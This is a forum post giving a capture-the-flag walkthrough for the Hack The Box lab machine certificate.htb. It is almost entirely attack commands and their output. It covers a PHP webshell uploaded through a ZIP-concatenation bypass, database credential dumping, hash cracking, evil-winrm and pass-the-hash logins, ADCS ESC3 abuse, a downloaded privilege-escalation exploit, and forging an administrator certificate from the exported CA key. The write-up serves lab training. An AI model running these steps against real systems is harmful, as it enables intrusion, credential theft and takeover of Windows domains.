02-07-25, 09:24 PM
TARGET : CERTIFICATE.HTB (If you want my cheat sheet with much more explanation I can provide it to you 
)
ZIP file upload bypass for RCE
Web application allows file uploads with security restrictions bypass via ZIP concatenation technique
Exploit technique:
Execution:
Database credential extraction
MySQL enumeration:
Extracted hashes:
Crack with hashcat:
Result:
WinRM access and PCAP analysis
Kerberos AS-REQ extraction from PCAP:
Extracted cipher:
Format for hashcat:
Crack Kerberos hash:
Result:
ADCS ESC3 vulnerability exploitation
WinRM access:
ADCS enumeration:
ESC3 conditions identified:
ESC3 exploitation:
Result:
Privesc via SeManageVolumePrivilege
Pass-the-hash access:
SeManageVolumePrivilege exploitation:
Root access via CA private key extraction (I tried dll hijacking but EDR blocks it)
Export CA private key:
Admin certificate forgery:
Administrator authentication:
Admin ntlm hash:
Credentials summary for noob and larper
)Code:
IP: 10.10.11.71 Hostname: certificate.htb Domain: CERTIFICATE.HTBWeb application allows file uploads with security restrictions bypass via ZIP concatenation technique
Exploit technique:
Code:
echo "test" > good.pdf
echo "<?php system(\$_GET['cmd']); ?>" > x.php
zip good.zip good.pdf
zip bad.zip x.php
cat good.zip bad.zip > final.zipExecution:
Code:
Navigate to course enrollmentAccess: http://certificate.htb/upload.php?s_id=44
# Upload final.zip
# Access webshell via uploaded PHP x.php as xamppuserDatabase credential extraction
MySQL enumeration:
Code:
# Found in db.php --> certificate_webapp_user:cert!f!c@teDBPWD
# Database enumeration (non-interactive shell)
.\mysql.exe -u 'certificate_webapp_user' -p'cert!f!c@teDBPWD' -e 'show databases;'
.\mysql.exe -u 'certificate_webapp_user' -p'cert!f!c@teDBPWD' -e 'use certificate_webapp_db; show tables;'
.\mysql.exe -u 'certificate_webapp_user' -p'cert!f!c@teDBPWD' -e 'use certificate_webapp_db; select * from users;'Extracted hashes:
Code:
sara.b:$2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6
Other hashes failed to crackCode:
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txtResult:
Code:
sara.b:Blink182WinRM access and PCAP analysis
Code:
evil-winrm -u "sara.b" -p "Blink182" -i "10.10.11.71"Kerberos AS-REQ extraction from PCAP:
Code:
# Found in ~/ws-01/WS-01PktMon.pcap
# Wireshark filter: kerberos.msg_type == 10 && kerberos.cipher
tshark -r WS-01PktMon.pcap -Y "kerberos.msg_type==10 && kerberos.CNameString && kerberos.realm && kerberos.cipher" -T fields -e kerberos.CNameString -e kerberos.realm -e kerberos.cipherExtracted cipher:
Code:
23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0Format for hashcat:
Code:
$krb5pa$18$Lion.SK$CERTIFICATE.HTB$23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0Crack Kerberos hash:
Code:
hashcat -m 19900 hash.txt /usr/share/wordlists/rockyou.txt -a 0Result:
Code:
lion.sk:!QAZ2wsxADCS ESC3 vulnerability exploitation
WinRM access:
Code:
evil-winrm -u "lion.sk" -p "!QAZ2wsx" -i "10.10.11.71"ADCS enumeration:
Code:
certipy find -u 'lion.sk@certificate.htb' -p '!QAZ2wsx' -dc-ip 10.10.11.71 -vulnerableESC3 conditions identified:
- Extended Key Usage: Certificate Request Agent
- Enrollment Rights: CERTIFICATE.HTB\Domain CRA Managers (lion.sk member)
- Authorized Signatures Required: 0
- Private Key Flag: ExportableKey
ESC3 exploitation:
Code:
# Step 1: Request delegation certificate
certipy req -u 'lion.sk@certificate.htb' -p '!QAZ2wsx' -dc-ip 10.10.11.71 -ca 'Certificate-LTD-CA' -template 'Delegated-CRA'
# Step 2: Request certificate on behalf of ryan.k
certipy req -u 'lion.sk@certificate.htb' -p '!QAZ2wsx' -dc-ip 10.10.11.71 -ca 'Certificate-LTD-CA' -template 'SignedUser' -on-behalf-of ryan.k -pfx lion.sk.pfx (for the -template take a template which has client auth activated and of which lion.sk has the enrollment rights)
# Step 3: Authenticate with certificate
ntpdate certificate.htb
certipy auth -pfx ryan.k.pfxResult:
Code:
ryan.k@certificate.htb: aad3b435b51404eeaad3b435b51404ee:b1bc3d70e70f4f36b1509a65ae1a2ae6Privesc via SeManageVolumePrivilege
Pass-the-hash access:
Code:
evil-winrm -u "ryan.k" -H "b1bc3d70e70f4f36b1509a65ae1a2ae6" -i 10.10.11.71SeManageVolumePrivilege exploitation:
Code:
# Download and execute SeManageVolumeExploit (on target) -> https://github.com/CsEnox/SeManageVolumeExploit/releases/tag/public
# Verify ACL modification : icacls C:/windows
# Should show BUILTIN\Users with (M) modify permissions (
if you see "administrator" instead of users rerun the exploit)Root access via CA private key extraction (I tried dll hijacking but EDR blocks it)
Export CA private key:
Code:
certutil -exportPFX my "Certificate-LTD-CA" C:\temp\x.pfx
# Download x.pfx to attacker machineAdmin certificate forgery:
Code:
certipy forge -ca-pfx x.pfx -upn 'administrator@certificate.htb' -out system.pfxAdministrator authentication:
Code:
ntpdate certificate.htb
certipy auth -pfx system.pfxAdmin ntlm hash:
Code:
administrator@certificate.htb: aad3b435b51404eeaad3b435b51404ee:d804304519bf0143c14cbf1c024408c6Credentials summary for noob and larper
Code:
sara.b:Blink182 (WinRM)
lion.sk:!QAZ2wsx (WinRM)
certificate_webapp_user:cert!f!c@teDBPWD (MySQL)
ryan.k:b1bc3d70e70f4f36b1509a65ae1a2ae6 (Pass-the-Hash)
administrator:d804304519bf0143c14cbf1c024408c6 (Pass-the-Hash)
